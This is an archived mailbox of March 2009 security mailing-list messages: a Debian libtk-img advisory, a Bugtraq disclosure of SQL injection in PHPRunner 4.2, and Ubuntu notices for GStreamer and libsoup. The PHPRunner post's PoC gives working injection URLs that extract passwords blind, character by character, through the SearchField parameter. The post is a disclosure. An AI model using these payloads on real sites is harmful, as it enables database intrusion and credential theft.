    Size/MD5 checksum:    59322 fc4813740e77630bb9c69cf3f4636342

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_amd64.deb
    Size/MD5 checksum:   136130 2807ef2c010419b0daa1a10bbcf26cfa
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_amd64.deb
    Size/MD5 checksum:    61522 b32861939b7bb9e5cb7dd0a0468e46f2

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_arm.deb
    Size/MD5 checksum:   129814 ab2b0b3b5ae507ef3aa0f8ad218513a7
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_arm.deb
    Size/MD5 checksum:    59210 0a1b9b43cef09ddc4613e5ca1afb9435

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_i386.deb
    Size/MD5 checksum:   119526 a7ab424a2a7ad7ec5b2a58097b96b206
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_i386.deb
    Size/MD5 checksum:    58924 3a65c23ecc11b3e581cb64d26912daab

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_ia64.deb
    Size/MD5 checksum:    59430 e54e0eb23f40d0d197db99d0dd04e651
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_ia64.deb
    Size/MD5 checksum:   186630 ebcca2c511bf43f1ef3b12e3adaae97d

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_mips.deb
    Size/MD5 checksum:    59338 fde2040f51b9bdb782382bb6bb21e74b
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_mips.deb
    Size/MD5 checksum:   128314 fa953d1ad555ba495f4e58ca824d83bc

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_mipsel.deb
    Size/MD5 checksum:    59340 9f570ecd96eba5b0c672113e7433c204
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_mipsel.deb
    Size/MD5 checksum:   128246 547d8c58d76735d00d93701028d05de7

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_powerpc.deb
    Size/MD5 checksum:    59248 95180c3c45dfbdc4dc4356253f915441
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_powerpc.deb
    Size/MD5 checksum:   156072 36b72aa56e99d26cfc773f2f5c916970

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_s390.deb
    Size/MD5 checksum:   131008 f4401f63947dd3a80f64c4b9abd80924
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_s390.deb
    Size/MD5 checksum:    59280 b0784e2a4579dff140ed9c65a7e75997

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img-dev_1.3-release-7+lenny1_sparc.deb
    Size/MD5 checksum:    59192 947382bad7ce91d54a477d59a3cd94d4
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-release-7+lenny1_sparc.deb
    Size/MD5 checksum:   121050 000240ceaa3638b39b3ee71bcee37406


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkm/Y2UACgkQ62zWxYk/rQecoQCdHQoi9/jessJFVBz6HYxPEiRF
bR8AoLE6EB7xB6GRXj9asWl5UH3AwuG3
=eRJ3
-----END PGP SIGNATURE-----

From - Tue Mar 17 13:21:15 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006a92
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39778-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F184FED94E
for <lists@securityspace.com>; Tue, 17 Mar 2009 13:16:56 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 069DB143D7D; Tue, 17 Mar 2009 08:32:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6017 invoked from network); 17 Mar 2009 10:44:17 -0000
Message-ID: <20090317140537.jujqxhg4aoowwswc@mail.amnpardaz.com>
Date: Tue, 17 Mar 2009 14:05:37 +0330
From: admin@bugreport.ir
To: bugtraq@securityfocus.com
Subject: PHPRunner SQL Injection
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-1;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
Status:   

##########################www.BugReport.ir########################################
#
#        AmnPardaz Security Research Team
#
# Title: PHPRunner SQL Injection
# Vendor: http://www.xlinesoft.com
# Vulnerable Version: 4.2 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_63.htm
# Fix: N/A
###################################################################################

####################
- Description:
####################

PHPRunner builds visually appealing web interface for popular  
databases. Your web site visitors will be able to easily search, add,  
edit, delete and exprt

data in MySQL, Oracle, SQL Server, MS Access, and Postgre databases.

####################
- Vulnerability:
####################

Input passed to the "SearchField" parameters in "UserView_list.php" is  
not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary  
SQL code.

Vulnerable Pages: 'orders_list.php' , 'users_list.php' ,  
'Administrator_list.php'


####################
- PoC:
####################

Its possible to obtain plain text passwords from database by blind  
fishing exploit

http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like  
'%%')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')--

####################
- Solution:
####################

Edit the source code to ensure that inputs are properly sanitized.


####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

From - Tue Mar 17 13:41:16 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006a94
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39769-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id AC7E7ED962
for <lists@securityspace.com>; Tue, 17 Mar 2009 13:38:46 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 24D87143A33; Tue, 17 Mar 2009 08:28:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26217 invoked from network); 16 Mar 2009 20:40:38 -0000
Subject: [USN-735-1] GStreamer Base Plugins vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -12.6
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.161
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-4CWYYsn/2vgKNb8C5mJK"
Date: Mon, 16 Mar 2009 16:41:20 -0400
Message-Id: <1237236080.29190.7.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.25.92 
Status:   


--=-4CWYYsn/2vgKNb8C5mJK
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-735-1             March 16, 2009
gst-plugins-base0.10 vulnerability
CVE-2009-0586
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  gstreamer0.10-plugins-base      0.10.21-3ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that the Base64 decoding functions in GStreamer Base
Plugins did not properly handle large images in Vorbis file tags. If a user
were tricked into opening a specially crafted Vorbis file, an attacker
could possibly execute arbitrary code with user privileges.


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gst-plugins-base0.10_0.10.21-3ubuntu0.1.diff.gz
      Size/MD5:    32114 087761c1ddba86cacb5d3d13890e39c4
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gst-plugins-base0.10_0.10.21-3ubuntu0.1.dsc
      Size/MD5:     2446 776e939b1f7f685f31bfb213ab498f50
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gst-plugins-base0.10_0.10.21.orig.tar.gz
      Size/MD5:  2845594 69caf16640ebf2477a9197f62a5d6ee2

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-doc_0.10.21-3ubuntu0.1_all.deb
      Size/MD5:   354980 9f5ca61fa4e5875203752f666c1a9827

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-alsa_0.10.21-3ubuntu0.1_amd64.deb
      Size/MD5:    39630 8de3196ec056dcdc304872a5b6d7a89d
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-gnomevfs_0.10.21-3ubuntu0.1_amd64.deb
      Size/MD5:    17504 320de292fea8251b2508a2101fe102ff
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-apps_0.10.21-3ubuntu0.1_amd64.deb
      Size/MD5:    45050 a9b8dc4cc2f7e6d96e195f05913c40c5
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-dbg_0.10.21-3ubuntu0.1_amd64.deb
      Size/MD5:  2116530 fc2d7445d6f477ffcf82df58c1e13c49
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base_0.10.21-3ubuntu0.1_amd64.deb
      Size/MD5:   574980 0561f45b70f0602a27bdca91ee9c9737
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-x_0.10.21-3ubuntu0.1_amd64.deb
      Size/MD5:    75554 b2018f9fb343d0e7c3a63825cfdc218b
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-0_0.10.21-3ubuntu0.1_amd64.deb
      Size/MD5:   296128 abb2d077b1ce2791accefd67f4379f52
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-dev_0.10.21-3ubuntu0.1_amd64.deb
      Size/MD5:    57920 29e9dd111a8611f66ed8d0c4dbbdd451

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-alsa_0.10.21-3ubuntu0.1_i386.deb
      Size/MD5:    35866 98179f92f2c8e9a189e030d5ebae0c2d
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-gnomevfs_0.10.21-3ubuntu0.1_i386.deb
      Size/MD5:    15956 d58d756ffd81a82417ffe8ff1a99360d
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-apps_0.10.21-3ubuntu0.1_i386.deb
      Size/MD5:    45084 729ece20541d14597c65bacb4992a8af
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-dbg_0.10.21-3ubuntu0.1_i386.deb
      Size/MD5:  2012246 ff9d76f152ddaf49077c064fa3a5cf96
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base_0.10.21-3ubuntu0.1_i386.deb
      Size/MD5:   545282 5306637b57c284b7b100b5e376433313
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/gstreamer0.10-x_0.10.21-3ubuntu0.1_i386.deb
      Size/MD5:    69244 5b3f1c7b3d22d5c228d9b515462d8fa0
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-0_0.10.21-3ubuntu0.1_i386.deb
      Size/MD5:   275338 da20ab3e25212ec17dee4a0f7a56298a
    http://security.ubuntu.com/ubuntu/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-dev_0.10.21-3ubuntu0.1_i386.deb
      Size/MD5:    58476 009ba58fc2cba5aa68778c2bdf30fec0

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-alsa_0.10.21-3ubuntu0.1_lpia.deb
      Size/MD5:    36370 b9d55f4942addff7a22aa7cc9ad9f5fa
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-gnomevfs_0.10.21-3ubuntu0.1_lpia.deb
      Size/MD5:    15970 5e4c4bd01da1f5d549b42cceb7c504dd
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-apps_0.10.21-3ubuntu0.1_lpia.deb
      Size/MD5:    45046 31f74e0feedf06865a15beace52aea87
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-dbg_0.10.21-3ubuntu0.1_lpia.deb
      Size/MD5:  2050002 4dd4f9600ac6f4b56a1a50e685e11d6d
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base_0.10.21-3ubuntu0.1_lpia.deb
      Size/MD5:   544594 a60cdc88e5042f36e8f06b9a36b63d60
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-x_0.10.21-3ubuntu0.1_lpia.deb
      Size/MD5:    68992 997db137876106dae7d1cea34e6cd57a
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-0_0.10.21-3ubuntu0.1_lpia.deb
      Size/MD5:   271472 0cca60030f41472a54160131ee0e71e2
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-dev_0.10.21-3ubuntu0.1_lpia.deb
      Size/MD5:    57908 971d4cd4a75f4d9f8146839d33d62597

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-alsa_0.10.21-3ubuntu0.1_powerpc.deb
      Size/MD5:    39192 1cebf894b76f7c3f37146c0a89db04e0
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-gnomevfs_0.10.21-3ubuntu0.1_powerpc.deb
      Size/MD5:    17736 cd7c22d8bdae65437d7cab295883d3ce
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-apps_0.10.21-3ubuntu0.1_powerpc.deb
      Size/MD5:    45046 ff9df1bc6dadfe233d556662baf308c1
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-dbg_0.10.21-3ubuntu0.1_powerpc.deb
      Size/MD5:  2141690 20bd1d66bd6cd4c3882c96df44706e03
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base_0.10.21-3ubuntu0.1_powerpc.deb
      Size/MD5:   619900 ac50db0473223cee0fdb75fb2cff68f4
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-x_0.10.21-3ubuntu0.1_powerpc.deb
      Size/MD5:    74564 9cad9303ed1f992e419caf79ae9b83bb
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-0_0.10.21-3ubuntu0.1_powerpc.deb
      Size/MD5:   307694 b438c6a7d6eeda92689e69a061b19ec4
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-dev_0.10.21-3ubuntu0.1_powerpc.deb
      Size/MD5:    57922 6946d3b3c1ecbe2fa40f65d46b8c2384

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-alsa_0.10.21-3ubuntu0.1_sparc.deb
      Size/MD5:    36182 0986c414db36aff71c2c608041473086
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-gnomevfs_0.10.21-3ubuntu0.1_sparc.deb
      Size/MD5:    16170 0b297a7d77455479587e1ac852e7510d
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-apps_0.10.21-3ubuntu0.1_sparc.deb
      Size/MD5:    45050 8d1a9a7f2b6d40bb3f4f5b0a6c466681
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base-dbg_0.10.21-3ubuntu0.1_sparc.deb
      Size/MD5:  1940702 96c0b54bb0a3f4f36db68753aad6b468
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-plugins-base_0.10.21-3ubuntu0.1_sparc.deb
      Size/MD5:   554774 94e88aa061a26a67d4fb2ccc447904f5
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/gstreamer0.10-x_0.10.21-3ubuntu0.1_sparc.deb
      Size/MD5:    69512 99a67191cd9488ff4bd7b84420ffa414
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-0_0.10.21-3ubuntu0.1_sparc.deb
      Size/MD5:   289030 b1302ea1e9660c9301a0baea78bbc371
    http://ports.ubuntu.com/pool/main/g/gst-plugins-base0.10/libgstreamer-plugins-base0.10-dev_0.10.21-3ubuntu0.1_sparc.deb
      Size/MD5:    57934 4d709ac874b48de220ae56c9f0dd4bd4



--=-4CWYYsn/2vgKNb8C5mJK
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkm+uW0ACgkQLMAs/0C4zNpDLwCffnoakWgiZzlMrt5q6xb4gGcv
sMIAoIgpBF9NKiQ8Qb38Y8J2GabR/wP4
=S6WS
-----END PGP SIGNATURE-----

--=-4CWYYsn/2vgKNb8C5mJK--

From - Tue Mar 17 14:21:16 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006a99
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39770-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id A1E00ED963
for <lists@securityspace.com>; Tue, 17 Mar 2009 14:21:10 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id D30FB143A63; Tue, 17 Mar 2009 08:29:03 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26270 invoked from network); 16 Mar 2009 20:42:33 -0000
Subject: [USN-737-1] libsoup vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -4.5
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.69.0.156
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-72Xf5OB1ESqN41sN99U/"
Date: Mon, 16 Mar 2009 16:43:15 -0400
Message-Id: <1237236195.29190.8.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.25.92 
Status:   


--=-72Xf5OB1ESqN41sN99U/
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-737-1             March 16, 2009
libsoup vulnerability
CVE-2009-0585
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libsoup2.2-8                    2.2.93-0ubuntu1.2

Ubuntu 7.10:
  libsoup2.2-8                    2.2.100-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that the Base64 encoding functions in libsoup did not
properly handle large strings. If a user were tricked into connecting to a
malicious server, an attacker could possibly execute arbitrary code with
user privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup_2.2.93-0ubuntu1.2.diff.gz
      Size/MD5:     5999 2c6d0c9c26f3cfb187bab8704111759c
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup_2.2.93-0ubuntu1.2.dsc
      Size/MD5:     1698 4d53c3a402f98463c1f8d9d2366326f0
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup_2.2.93.orig.tar.gz
      Size/MD5:   616955 b41efe6d3d475b20fb3b42c134bbccd3

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/libs/libsoup/libsoup2.2-doc_2.2.93-0ubuntu1.2_all.deb
      Size/MD5:   112506 e162243c762fe49fefe550c302ced8a6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-8_2.2.93-0ubuntu1.2_amd64.deb
      Size/MD5:   127134 56deb8b6f18138d817822163d7074f6e
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-dev_2.2.93-0ubuntu1.2_amd64.deb
      Size/MD5:   166546 73ba8013211a1b407b6af0a80d807691

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-8_2.2.93-0ubuntu1.2_i386.deb
      Size/MD5:   116102 ba19b3980dba1ca1583a9267d7c98780
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-dev_2.2.93-0ubuntu1.2_i386.deb
      Size/MD5:   144636 82452ca9c4fbd71231b497f1c9ad3439

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-8_2.2.93-0ubuntu1.2_powerpc.deb
      Size/MD5:   122206 ef801a4822d5147fe5896ea477b3a394
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-dev_2.2.93-0ubuntu1.2_powerpc.deb
      Size/MD5:   167658 3b9d43649f09a3b852514885c0933a01

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-8_2.2.93-0ubuntu1.2_sparc.deb
      Size/MD5:   120856 b2ef9ddf42f083dd49eabb0d155760fd
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-dev_2.2.93-0ubuntu1.2_sparc.deb
      Size/MD5:   157774 8e9a2a6a6bc9b9349a08179c33e800a6

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup_2.2.100-1ubuntu0.1.diff.gz
      Size/MD5:     6339 95f4ec280c5e19a4806a2055e108cd03
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup_2.2.100-1ubuntu0.1.dsc
      Size/MD5:     1049 17f92ccd52f6c4e633201f49d60f613e
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup_2.2.100.orig.tar.gz
      Size/MD5:   695700 cb6445ebbc18c1b1f29ae0840e79b96b

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-doc_2.2.100-1ubuntu0.1_all.deb
      Size/MD5:   146400 2148bb2b79553a19c8ca3ac230af4cb3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-8_2.2.100-1ubuntu0.1_amd64.deb
      Size/MD5:   137410 710d3f58e47401ffd4e82efcb46078a7
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-dev_2.2.100-1ubuntu0.1_amd64.deb
      Size/MD5:   176090 de65122ca26ca4d53c4398db64ce16c8

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-8_2.2.100-1ubuntu0.1_i386.deb
      Size/MD5:   129712 13f33cfb861ea47e4e0d80af736ce213
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-dev_2.2.100-1ubuntu0.1_i386.deb
      Size/MD5:   157814 41a420b7ab3ca4f96bd40452ba3caabb

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libs/libsoup/libsoup2.2-8_2.2.100-1ubuntu0.1_lpia.deb
      Size/MD5:   127114 3b23f35a2f658daf075c605c9393a34f
    http://ports.ubuntu.com/pool/main/libs/libsoup/libsoup2.2-dev_2.2.100-1ubuntu0.1_lpia.deb
      Size/MD5:   155720 432d9b911c145fafbd4cb897a251fd39

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-8_2.2.100-1ubuntu0.1_powerpc.deb
      Size/MD5:   140772 1f04b1ce7a24d1337671197b3e0282d2
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-dev_2.2.100-1ubuntu0.1_powerpc.deb
      Size/MD5:   176862 ed391a0f8ce8c49d94fe956966cefad9

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-8_2.2.100-1ubuntu0.1_sparc.deb
      Size/MD5:   130556 fc66cc245388bb6cba540ae6b3c33d27
    http://security.ubuntu.com/ubuntu/pool/main/libs/libsoup/libsoup2.2-dev_2.2.100-1ubuntu0.1_sparc.deb
      Size/MD5:   165436 ebcc175df15a7b8105d72d8b92d86161



--=-72Xf5OB1ESqN41sN99U/
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

